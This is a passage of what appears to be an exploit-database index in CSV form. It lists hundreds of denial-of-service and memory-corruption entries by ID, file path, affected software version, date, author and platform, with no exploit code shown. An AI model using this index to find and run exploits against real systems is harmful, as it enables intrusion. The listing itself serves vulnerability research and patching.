(Metasploit)",2014-05-28,j0sm1,multiple,dos,5247 -33559,exploits/multiple/dos/33559.txt,"Sun Java System Web Server 7.0 Update 6 - 'admin' Server Denial of Service",2010-01-22,Intevydis,multiple,dos, -33560,exploits/multiple/dos/33560.txt,"Sun Java System Web Server 6.1/7.0 - WebDAV Format String",2010-01-22,Intevydis,multiple,dos, -33571,exploits/linux/dos/33571.txt,"PostgreSQL - 'bitsubstr' Buffer Overflow",2010-01-27,Intevydis,linux,dos, -33585,exploits/lin_x86-64/dos/33585.txt,"Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service",2010-02-01,"Mathias Krause",lin_x86-64,dos, -33587,exploits/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos, -33607,exploits/multiple/dos/33607.html,"Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",multiple,dos, -33608,exploits/windows/dos/33608.html,"Apple Safari 4.0.4 - Remote Denial of Service",2010-02-07,"599eme Man",windows,dos, -33625,exploits/php/dos/33625.php,"PHP 5.3.1 - 'session_save_path() Safe_mode()' Restriction Bypass Exploiot",2010-02-11,"Grzegorz Stachowiak",php,dos, -33713,exploits/windows/dos/33713.py,"Core FTP LE 2.2 - Heap Overflow (PoC)",2014-06-11,"Gabor Seljan",windows,dos, -33677,exploits/php/dos/33677.txt,"PHP 5.3.1 - LCG Entropy Security",2010-02-26,Rasmus,php,dos, -33672,exploits/linux/dos/33672.txt,"Kojoney 0.0.4.1 - 'urllib.urlopen()' Remote Denial of Service",2010-02-24,Nicob,linux,dos, -33707,exploits/windows/dos/33707.txt,"Orb Networks 2.54.18 - Orb Direct Show Filter '.MP3' File Divide-by-Zero Denial of Service",2010-03-04,"Matthew Bergin",windows,dos, -33708,exploits/bsd/dos/33708.c,"FreeBSD 8.0 / OpenBSD 4.x - 'ftpd' Null Pointer Dereference Denial of Service",2010-03-05,kingcope,bsd,dos, -33838,exploits/windows/dos/33838.py,"Mocha W32 LPD 1.9 - Remote Buffer Overflow",2010-04-15,mr_me,windows,dos, -33711,exploits/windows/dos/33711.txt,"BS.Player 2.51 - '.mp3' Buffer Overflow",2010-03-05,"Gjoko Krstic",windows,dos, -33719,exploits/windows/dos/33719.py,"Microsoft Windows XP/Vista - '.ani tagBITMAPINFOHEADER' Denial of Service",2010-03-08,Skylined,windows,dos, -33729,exploits/multiple/dos/33729.txt,"PostgreSQL 8.4.1 - JOIN Hashtable Size Integer Overflow Denial of Service",2014-06-13,"Bernt Marius Johnsen",multiple,dos, -33733,exploits/windows/dos/33733.pl,"httpdx 1.5.3 - '.png' File Handling Remote Denial of Service",2010-03-10,"Jonathan Salwan",windows,dos, -33735,exploits/multiple/dos/33735.txt,"SUPERAntiSpyware 4.34.1000 and SuperAdBlocker 4.6.1000 - Multiple Vulnerabilities",2010-03-10,"Luka Milkovic",multiple,dos, -33737,exploits/hardware/dos/33737.py,"ZTE / TP-Link RomPager - Denial of Service",2014-06-13,"Osanda Malith",hardware,dos, -33755,exploits/php/dos/33755.php,"PHP 5.3.2 'xmlrpc' Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos, -33770,exploits/windows/dos/33770.txt,"Microsoft Windows Media Player 11 - '.AVI' File Colorspace Conversion Remote Memory Corruption",2010-03-17,ITSecTeam,windows,dos, -33775,exploits/windows/dos/33775.py,"Xilisoft Video Converter Wizard - '.yuv' Stack Buffer Overflow",2010-03-19,ITSecTeam,windows,dos, -33778,exploits/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 - GET Format String Denial of Service",2010-03-20,Rick2600,windows,dos, -33800,exploits/multiple/dos/33800.html,"Mozilla Firefox 3.6 - 'gfxTextRun::SanitizeGlyphRuns()' Remote Memory Corruption",2010-03-24,"Jesse Ruderman",multiple,dos, -33801,exploits/linux/dos/33801.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Multiple Memory Corruption Vulnerabilities",2010-03-24,"Bob Clary",linux,dos, -33804,exploits/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow",2014-06-18,LiquidWorm,windows,dos, -33819,exploits/windows/dos/33819.txt,"McAfee Email Gateway < 6.7.2 Hotfix 2 - Multiple Vulnerabilities",2010-04-06,"Nahuel Grisolia",windows,dos, -33849,exploits/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation Null Pointer Denial of Service",2014-06-13,"A reliable source",windows,dos, -33850,exploits/linux/dos/33850.txt,"memcached 1.4.2 - Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,linux,dos, -33860,exploits/windows/dos/33860.html,"Microsoft Internet Explorer 8/9/10 - 'CInput' Use-After-Free Crash (PoC) (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos, -34145,exploits/unix/dos/34145.txt,"Python 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,unix,dos, -33876,exploits/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 - Remote Denial of Service / Arbitrary Memory Read",2007-09-14,mu-b,multiple,dos, -33879,exploits/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP 13.0 - Remote Denial of Service",2007-10-02,mu-b,multiple,dos, -33886,exploits/linux/dos/33886.txt,"Linux Kernel 2.6.34 - 'find_keyring_by_name()' Local Memory Corruption",2010-04-27,"Toshiyuki Okajima",linux,dos, -40096,exploits/multiple/dos/40096.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (2)",2016-07-13,COSIG,multiple,dos, -40097,exploits/multiple/dos/40097.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (3)",2016-07-13,COSIG,multiple,dos, -40098,exploits/multiple/dos/40098.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (4)",2016-07-13,COSIG,multiple,dos, -34102,exploits/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80 -33965,exploits/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 - GET Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos, -33966,exploits/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data - Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos, -33968,exploits/windows/dos/33968.pl,"Xitami 5.0 - '/AUX' Request Remote Denial of Service",2010-05-10,"Usman Saeed",windows,dos, -33924,exploits/windows/dos/33924.py,"RealVNC 4.1.3 - 'ClientCutText' Message Remote Denial of Service",2010-05-02,"John Leitch",windows,dos, -33926,exploits/windows/dos/33926.py,"ddrLPD 1.0 - Remote Denial of Service",2010-04-29,"Bisphemol A",windows,dos, -33943,exploits/aix/dos/33943.txt,"Flussonic Media Server 4.1.25 < 4.3.3 - Arbitrary File Disclosure",2014-07-01,"BGA Security",aix,dos,8080 -33951,exploits/windows/dos/33951.txt,"Baidu Spark Browser 26.5.9999.3511 - Remote Stack Overflow (Denial of Service)",2014-07-02,LiquidWorm,windows,dos, -33973,exploits/windows/dos/33973.pl,"Hyplay 1.2.0326.1 - '.asx' Remote Denial of Service",2010-05-10,"Steve James",windows,dos, -33977,exploits/windows/dos/33977.txt,"Torque Game Engine - Multiple Denial of Service Vulnerabilities",2010-05-09,"Luigi Auriemma",windows,dos, -34010,exploits/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos, -34027,exploits/solaris/dos/34027.txt,"Sun Solaris 10 - Nested Directory Tree Local Denial of Service",2010-05-21,"Maksymilian Arciemowicz",solaris,dos, -34028,exploits/solaris/dos/34028.txt,"Sun Solaris 10 - 'in.ftpd' Long Command Handling Security",2010-05-21,"Maksymilian Arciemowicz",solaris,dos, -34051,exploits/windows/dos/34051.py,"Core FTP Server 1.0.343 - Directory Traversal",2010-05-28,"John Leitch",windows,dos, -34058,exploits/multiple/dos/34058.txt,"DM Database Server - 'SP_DEL_BAK_EXPIRED' Memory Corruption",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos, -34069,exploits/windows/dos/34069.html,"Microsoft Internet Explorer 8 - CSS 'expression' Remote Denial of Service",2010-01-01,MustLive,windows,dos, -34090,exploits/multiple/dos/34090.py,"Node Browserify 4.2.0 - Remote Code Execution",2014-07-16,"Cal Leeming",multiple,dos, -34093,exploits/windows/dos/34093.txt,"EA Battlefield 2 1.41 / Battlefield 2142 1.50 - Multiple Denial of Service Vulnerabilities",2010-06-07,"Francis Lavoie-Renaud",windows,dos, -34094,exploits/windows/dos/34094.pl,"Aqua Real Screensaver - '.ar' Buffer Overflow",2010-01-15,R3d-D3V!L,windows,dos, -34340,exploits/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial of Service",2010-07-15,"Luigi Auriemma",multiple,dos, -34129,exploits/windows/dos/34129.txt,"World Of Warcraft 3.3.5a - 'macros-cache.txt' Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos, -34133,exploits/linux/dos/34133.txt,"Apache 2.4.7 mod_status - Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos, -34135,exploits/windows/dos/34135.py,"DjVuLibre 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos, -34158,exploits/windows/dos/34158.txt,"Chrome Engine 4 - Denial of Service",2010-06-17,"Luigi Auriemma",windows,dos, -34151,exploits/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution",2010-06-16,h07,windows,dos, -34162,exploits/windows/dos/34162.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH)",2014-07-24,"Gabor Seljan",windows,dos, -34164,exploits/linux/dos/34164.pl,"Make 3.81 - Heap Overflow (PoC)",2014-07-24,HyP,linux,dos, -34172,exploits/hardware/dos/34172.txt,"Sagem Fast 3304-V1 - Denial of Service",2014-07-27,Z3ro0ne,hardware,dos, -34203,exploits/hardware/dos/34203.txt,"D-Link DWR-113 Rev. Ax - Cross-Site Request Forgery / Denial of Service",2014-07-30,"Blessen Thomas",hardware,dos, -34227,exploits/windows/dos/34227.txt,"Qt 4.6.3 - Remote Denial of Service",2010-06-29,"Luigi Auriemma",windows,dos, -34228,exploits/linux/dos/34228.txt,"Mumble Murmur 1.2 - Denial of Service",2010-06-29,"Luigi Auriemma",linux,dos, -34233,exploits/windows/dos/34233.py,"Sumatra PDF 1.1 - Denial of Service",2010-07-01,"Azim Poonawala",windows,dos, -34248,exploits/multiple/dos/34248.txt,"EDItran Communications Platform (editcp) 4.1 - Remote Buffer Overflow",2010-07-05,"Pedro Andujar",multiple,dos, -34249,exploits/linux/dos/34249.txt,"Freeciv 2.2.1 - Multiple Remote Denial of Service Vulnerabilities",2010-07-03,"Luigi Auriemma",linux,dos, -34251,exploits/windows/dos/34251.txt,"Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial of Service Vulnerabilities",2010-07-05,"Luigi Auriemma",windows,dos, -34261,exploits/multiple/dos/34261.txt,"Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow",2010-07-06,"Luigi Auriemma",multiple,dos, -34270,exploits/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow",2010-07-07,"Luigi Auriemma",multiple,dos, -34278,exploits/linux/dos/34278.txt,"LibTIFF 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service",2010-07-12,"Tom Lane",linux,dos, -34279,exploits/linux/dos/34279.txt,"LibTIFF 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service",2010-06-14,"Tom Lane",linux,dos, -34528,exploits/multiple/dos/34528.py,"Adobe Acrobat and Reader 9.3.4 - 'AcroForm.api' Memory Corruption",2010-08-25,ITSecTeam,multiple,dos, -34281,exploits/windows/dos/34281.py,"MP3 Cutter 1.8 MP3 - File Processing Remote Denial of Service",2010-07-09,"Prashant Uniyal",windows,dos, -34306,exploits/hardware/dos/34306.txt,"SHARP MX Series - Denial of Service",2014-08-09,pws,hardware,dos,23 -34307,exploits/hardware/dos/34307.txt,"Sky Broadband Router SR101 - Weak WPA-PSK Generation Algorithm",2014-08-09,"Matt O'Connor",hardware,dos, -34309,exploits/solaris/dos/34309.txt,"Oracle Solaris - 'rdist' Privilege Escalation",2010-07-13,"Monarch Rich",solaris,dos, -34348,exploits/linux/dos/34348.txt,"OpenLDAP 2.4.22 - 'modrdn' Multiple Vulnerabilities",2010-07-19,"Ilkka Mattila",linux,dos, -34355,exploits/windows/dos/34355.txt,"Microsoft DirectX 8/9 DirectPlay - Multiple Denial of Service Vulnerabilities",2010-07-18,"Luigi Auriemma",windows,dos, -34356,exploits/linux/dos/34356.txt,"gif2png 2.5.2 - Remote Buffer Overflow",2009-12-12,"Razuel Akaharnath",linux,dos, -34359,exploits/windows/dos/34359.html,"Microsoft Outlook Web Access for Exchange Server 2003 - Cross-Site Request Forgery",2010-07-20,anonymous,windows,dos, -34360,exploits/multiple/dos/34360.txt,"Monolith Lithtech Game Engine - Memory Corruption",2010-07-21,"Luigi Auriemma",multiple,dos, -34364,exploits/linux/dos/34364.html,"Qt 4.6.3 - 'QTextEngine::LayoutData::reallocate()' Memory Corruption",2010-07-13,D4rk357,linux,dos, -34368,exploits/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - '.mp3' Remote Buffer Overflow",2009-10-31,4m!n,windows,dos, -34375,exploits/linux/dos/34375.txt,"sSMTP 2.62 - 'standardize()' Buffer Overflow",2010-07-26,"Brendan Boerner",linux,dos, -34394,exploits/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - GET Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",hardware,dos, -34395,exploits/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial of Service",2010-08-03,"Rodrigo Escobar",windows,dos, -34403,exploits/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - USER Command Remote Buffer Overflow",2010-07-22,demonalex,windows,dos, -34404,exploits/windows/dos/34404.pl,"K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,windows,dos, -34427,exploits/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption",2010-08-07,"Georgi Guninski",linux,dos, -34428,exploits/windows/dos/34428.py,"Quintessential Media Player 5.0.121 - '.m3u' Buffer Overflow",2010-08-09,"Abhishek Lyall",windows,dos, -34442,exploits/windows/dos/34442.html,"Kylinsoft InstantGet 2.08 - ActiveX Control 'ShowBar' Method Buffer Overflow",2009-09-19,the_Edit0r,windows,dos, -34457,exploits/multiple/dos/34457.txt,"Sniper Elite 1.0 - Null Pointer Dereference Denial of Service",2009-08-14,"Luigi Auriemma",multiple,dos, -34458,exploits/windows/dos/34458.html,"Microsoft Internet Explorer - Memory Corruption (PoC) (MS14-029)",2014-08-28,PhysicalDrive0,windows,dos, -34460,exploits/windows/dos/34460.py,"Sonique 2.0 - '.xpl' Remote Stack Based Buffer Overflow",2010-08-12,"Hamza_hack_dz & Black-liondz1",windows,dos, -34463,exploits/windows/dos/34463.py,"HTML Help Workshop 1.4 - Buffer Overflow (SEH)",2014-08-29,"Moroccan Kingdom (MKD)",windows,dos, -34480,exploits/windows/dos/34480.py,"Xilisoft Video Converter 3.1.8.0720b - '.ogg' Buffer Overflow",2010-08-16,"Praveen Darshanam",windows,dos, -34502,exploits/windows/dos/34502.py,"Serveez 0.1.7 - 'If-Modified-Since' Header Stack Buffer Overflow",2009-08-09,"lvac lvac",windows,dos, -34505,exploits/php/dos/34505.txt,"MySQL 5.1.48 - 'Temporary InnoDB' Tables Denial of Service",2010-08-19,"Boris Reisig",php,dos, -34506,exploits/linux/dos/34506.txt,"MySQL 5.1.48 - 'EXPLAIN' Denial of Service",2010-08-20,"Bjorn Munch",linux,dos, -34510,exploits/linux/dos/34510.txt,"OraclMySQL 5.1.48 - 'LOAD DATA INFILE' Denial of Service",2010-08-20,"Elena Stepanova",linux,dos, -35592,exploits/windows/dos/35592.py,"jetAudio 8.1.3 Basic (mp3) - Crash (PoC)",2014-12-23,"Drozdova Liudmila",windows,dos, -34520,exploits/linux/dos/34520.txt,"Oracle MySQL 5.1.48 - 'HANDLER' Interface Denial of Service",2010-08-20,"Matthias Leich",linux,dos, -34521,exploits/linux/dos/34521.txt,"Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial of Service",2010-08-20,"Shane Bester",linux,dos, -34522,exploits/linux/dos/34522.txt,"Oracle MySQL < 5.1.49 - 'DDL' Statements Denial of Service",2010-07-09,"Elena Stepanova",linux,dos, -34530,exploits/windows/dos/34530.py,"Crystal Player 1.98 - '.mls' Buffer Overflow",2010-08-20,"Praveen Darshanam",windows,dos, -34540,exploits/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) (Python)",2014-09-05,"Robert Kugler",windows,dos, -34588,exploits/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilities",2014-09-09,jsass,aix,dos, -34603,exploits/windows/dos/34603.py,"Adobe Acrobat and Reader 9.3.4 - 'acroform_PlugInMain' Memory Corruption",2010-09-06,ITSecTeam,windows,dos, -34602,exploits/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 - CSS Handling Cross Domain Information Disclosure",2010-09-06,"Chris Evans",windows,dos, -34698,exploits/windows/dos/34698.txt,"Microsoft Excel 2002 - Memory Corruption",2010-09-23,Abysssec,windows,dos, -34720,exploits/windows/dos/34720.pl,"Fast Image Resizer 098 - Local Crash (PoC)",2014-09-20,"niko sec",windows,dos, -34729,exploits/windows/dos/34729.py,"Seafile-server 3.1.5 - Remote Denial of Service",2014-09-20,"nop nop",windows,dos, -34752,exploits/windows/dos/34752.c,"WS10 Data Server - SCADA Overflow (PoC)",2014-09-24,"Pedro Sánchez",windows,dos, -34767,exploits/windows/dos/34767.py,"BS.Player 2.56 - '.m3u' / '.pls' File Processing Multiple Remote Denial of Service Vulnerabilities",2010-09-26,modpr0be,windows,dos, -34855,exploits/windows/dos/34855.pl,"ALPHA Player 2.4 - '.bmp' Buffer Overflow",2010-10-19,anT!-Tr0J4n,windows,dos, -34857,exploits/windows/dos/34857.txt,"TeamSpeak Client 3.0.14 - Buffer Overflow",2014-10-02,"SpyEye & Christian Galeon",windows,dos, -34872,exploits/windows/dos/34872.py,"MASS PLAYER 2.1 - File Processing Remote Denial of Service",2010-10-19,Sweet,windows,dos, -34889,exploits/windows/dos/34889.vcf,"Microsoft Windows Mobile - Overly Long vCard Name Field Denial of Service",2010-10-21,SecurityArchitect.Org,windows,dos, -34938,exploits/windows/dos/34938.txt,"TeamSpeak 2.0.32.60 - Memory Corruption",2010-10-28,"Jokaim & nSense",windows,dos, -34953,exploits/linux/dos/34953.txt,"FUSE fusermount Tool - Race Condition",2010-11-02,halfdog,linux,dos, -34980,exploits/novell/dos/34980.py,"Novell Groupwise 8.0 - Multiple Remote Vulnerabilities",2010-11-08,"Francis Provencher",novell,dos, -35013,exploits/linux/dos/35013.c,"Linux Kernel 2.6.x - 'inotify_init()' Memory Leak Local Denial of Service",2010-11-24,"Vegard Nossum",linux,dos, -35000,exploits/windows/dos/35000.txt,"SAP NetWeaver Enqueue Server - Denial of Service",2014-10-17,"Core Security",windows,dos,3200 -35058,exploits/bsd/dos/35058.c,"OpenBSD 5.5 - Local Kernel Panic (Denial of Service)",2014-10-25,nitr0us,bsd,dos, -40099,exploits/multiple/dos/40099.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (5)",2016-07-13,COSIG,multiple,dos, -40100,exploits/multiple/dos/40100.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (6)",2016-07-13,COSIG,multiple,dos, -40101,exploits/multiple/dos/40101.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (7)",2016-07-13,COSIG,multiple,dos, -40102,exploits/multiple/dos/40102.txt,"Adobe Flash Player 22.0.0.192 - DefineBitsJPEG2 Memory Corruption",2016-07-13,COSIG,multiple,dos, -40103,exploits/multiple/dos/40103.txt,"Adobe Flash Player 22.0.0.192 - DefineSprite Memory Corruption",2016-07-13,COSIG,multiple,dos, -35061,exploits/linux/dos/35061.c,"GNU glibc - 'regcomp()' Stack Exhaustion Denial of Service",2010-12-07,"Maksymilian Arciemowicz",linux,dos, -35081,exploits/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos, -35086,exploits/multiple/dos/35086.rb,"Allegro RomPager 4.07 - UPnP HTTP Request Remote Denial of Service",2010-12-08,"Ricky-Lee Birtles",multiple,dos, -35105,exploits/windows/dos/35105.pl,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow / Denial of Service EIP Overwrite",2014-10-29,"ZoRLu Bugrahan",windows,dos, -35153,exploits/osx/dos/35153.c,"Apple Mac OSX (Mavericks) - 'IOBluetoothHCIUserClient' Privilege Escalation",2014-11-03,"rpaleari & joystick",osx,dos, -35154,exploits/asp/dos/35154.txt,"Sigma Portal - 'ShowObjectPicture.aspx' Denial of Service",2010-12-27,"Pouya Daneshmand",asp,dos, -35158,exploits/windows/dos/35158.py,"Mongoose 2.11 - 'Content-Length' HTTP Header Remote Denial of Service",2010-12-27,JohnLeitch,windows,dos, -35162,exploits/linux/dos/35162.cob,"GIMP 2.6.7 - Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos, -35163,exploits/windows/dos/35163.c,"ImgBurn 2.4 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-01-01,d3c0der,windows,dos, -35164,exploits/php/dos/35164.php,"PHP 5.3.2 - 'zend_strtod()' Floating-Point Value Denial of Service",2011-01-03,"Rick Regan",php,dos, -35173,exploits/linux/dos/35173.txt,"Minix 3.3.0 - Local Denial of Service (PoC)",2014-11-06,nitr0us,linux,dos, -35178,exploits/windows/dos/35178.py,"i.Hex 0.98 - Local Crash (PoC)",2014-11-06,metacom,windows,dos, -35179,exploits/windows/dos/35179.py,"i.Mage 1.11 - Local Crash (PoC)",2014-11-06,metacom,windows,dos, -35182,exploits/win_x86/dos/35182.txt,"VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read",2014-11-06,KoreLogic,win_x86,dos, -35202,exploits/windows/dos/35202.py,"Microsoft Internet Explorer 11 - Denial of Service",2014-11-10,"Behrooz Abbassi",windows,dos, -35217,exploits/windows/dos/35217.txt,"CorelDRAW X7 CDR File - 'CdrTxt.dll' Off-by-One Stack Corruption",2014-11-12,LiquidWorm,windows,dos, -35240,exploits/linux/dos/35240.c,"acpid 1.0.x - Multiple Local Denial of Service Vulnerabilities",2011-01-19,"Vasiliy Kulikov",linux,dos, -35244,exploits/windows/dos/35244.py,"Golden FTP Server 4.70 - Malformed Message Denial of Service",2011-01-19,"Craig Freyman",windows,dos, -35279,exploits/osx/dos/35279.html,"Apple Mac OSX Safari 8.0 - Crash (PoC)",2014-11-17,w3bd3vil,osx,dos, -35302,exploits/linux/dos/35302.c,"Minix 3.3.0 - Remote TCP/IP Stack Denial of Service",2014-11-19,nitr0us,linux,dos,31337 -35304,exploits/multiple/dos/35304.txt,"Oracle Java - Floating-Point Value Denial of Service",2011-02-01,"Konstantin Preisser",multiple,dos, -35326,exploits/windows/dos/35326.cpp,"Microsoft Windows - 'win32k.sys' Denial of Service",2014-11-22,Kedamsky,windows,dos, -35339,exploits/multiple/dos/35339.txt,"JourneyMap 5.0.0RC2 Ultimate Edition - Resource Consumption (Denial of Service)",2014-11-24,CovertCodes,multiple,dos, -35342,exploits/aix/dos/35342.txt,"RobotStats 1.0 - HTML Injection",2014-11-24,"ZoRLu Bugrahan",aix,dos, -35345,exploits/hardware/dos/35345.txt,"TP-Link TL-WR740N - Denial of Service",2014-11-24,LiquidWorm,hardware,dos, -35354,exploits/php/dos/35354.txt,"PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference Denial of Service",2011-02-17,"Maksymilian Arciemowicz",php,dos, -35358,exploits/php/dos/35358.txt,"PHP 5.5.12 - Locale::parseLocale Memory Corruption",2014-11-24,"John Leitch",php,dos, -35359,exploits/multiple/dos/35359.txt,"tcpdump 4.6.2 - Geonet Decoder Denial of Service",2014-11-24,"Steffen Bauch",multiple,dos, -35363,exploits/windows/dos/35363.txt,"TRENDnet SecurView Wireless Network Camera TV-IP422WN - 'UltraCamX.ocx' Stack Buffer Overflow",2014-11-25,LiquidWorm,windows,dos, -35369,exploits/multiple/dos/35369.txt,"Battlefield 2/2142 - Packet Null Pointer Dereference Remote Denial of Service",2011-02-22,"Luigi Auriemma",multiple,dos, -35379,exploits/windows/dos/35379.go,"Elipse E3 - HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80 -35382,exploits/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos, -35403,exploits/linux/dos/35403.c,"Linux Kernel 2.6.x - epoll Nested Structures Local Denial of Service",2011-03-02,"Nelson Elhage",linux,dos, -35404,exploits/linux/dos/35404.c,"Linux Kernel 2.6.x - fs/eventpoll.c epoll Data Structure File Descriptor Local Denial of Service",2011-03-02,"Nelson Elhage",linux,dos, -35413,exploits/php/dos/35413.php,"WordPress 4.0 - Denial of Service",2014-12-01,SECURELI.com,php,dos,80 -35414,exploits/php/dos/35414.txt,"WordPress < 4.0.1 - Denial of Service",2014-12-01,"Javer Nieto & Andres Rojas",php,dos,80 -35415,exploits/php/dos/35415.txt,"Drupal < 7.34 - Denial of Service",2014-12-01,"Javer Nieto & Andres Rojas",php,dos,80 -35432,exploits/linux/dos/35432.txt,"Wireshark 1.4.3 - NTLMSSP Null Pointer Dereference Denial of Service",2011-03-01,"Buildbot Builder",linux,dos, -35437,exploits/multiple/dos/35437.pl,"Air Contacts Lite - HTTP Packet Denial of Service",2011-02-09,"Rodrigo Escobar",multiple,dos, -35445,exploits/linux/dos/35445.txt,"OpenLDAP 2.4.x - 'modrdn' NULL OldDN Remote Denial of Service",2011-01-03,"Serge Dubrouski",linux,dos, -35465,exploits/multiple/dos/35465.pl,"VideoLAN VLC Media Player 1.0.5 - '.ape' Denial of Service",2011-03-15,KedAns-Dz,multiple,dos, -35478,exploits/linux/dos/35478.txt,"MHonArc 2.6.16 - Tag Nesting Remote Denial of Service",2010-12-21,anonymous,linux,dos, -35483,exploits/php/dos/35483.txt,"PHP 5.3.x 'Intl' Extension - 'NumberFormatter::setSymbol()' Denial of Service",2011-03-10,thoger,php,dos, -35484,exploits/php/dos/35484.php,"PHP 5.3.x 'Zip' Extension - 'stream_get_contents()' Denial of Service",2011-03-10,paulgao,php,dos, -35485,exploits/php/dos/35485.php,"PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Denial of Service",2011-03-10,TorokAlpar,php,dos, -35486,exploits/php/dos/35486.php,"PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Plaintext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos, -35487,exploits/php/dos/35487.php,"PHP < 5.3.6 'OpenSSL' Extension - 'openssl_decrypt' Ciphertext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos, -35489,exploits/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",multiple,dos, -35502,exploits/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service",2011-03-27,KedAns-Dz,windows,dos, -35507,exploits/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos, -35530,exploits/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) (Denial of Service)",2014-12-15,s-dz,windows,dos, -35531,exploits/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (SEH) (Denial of Service)",2014-12-15,s-dz,windows,dos, -35532,exploits/windows/dos/35532.py,"jaangle 0.98i.977 - Denial of Service",2014-12-15,s-dz,windows,dos, -35539,exploits/php/dos/35539.txt,"phpMyAdmin 4.0.x/4.1.x/4.2.x - Denial of Service",2014-12-15,"Javer Nieto & Andres Rojas",php,dos, -35552,exploits/windows/dos/35552.py,"MoviePlay 4.82 - '.avi' Buffer Overflow",2011-03-31,^Xecuti0N3r,windows,dos, -35553,exploits/windows/dos/35553.pl,"Microsoft Windows Media Player 11.0.5721.5145 - '.avi' Buffer Overflow",2011-03-31,^Xecuti0N3r,windows,dos, -35580,exploits/linux/dos/35580.rb,"Ettercap 0.8.0 < 0.8.1 - Multiple Denial of Service Vulnerabilities",2014-12-19,"Nick Sampanis",linux,dos, -35589,exploits/windows/dos/35589.py,"Notepad++ 6.6.9 - Buffer Overflow",2014-12-22,TaurusOmar,windows,dos, -35600,exploits/linux/dos/35600.c,"Linux Kernel 2.6.x - 'inotify_init1()' Double-Free Local Denial of Service",2011-04-11,anonymous,linux,dos, -35613,exploits/multiple/dos/35613.py,"TOTVS ERP Microsiga Protheus 8/10 - Memory Corruption (Denial of Service)",2011-04-13,waKKu,multiple,dos, -35622,exploits/windows/dos/35622.txt,"Wickr Desktop 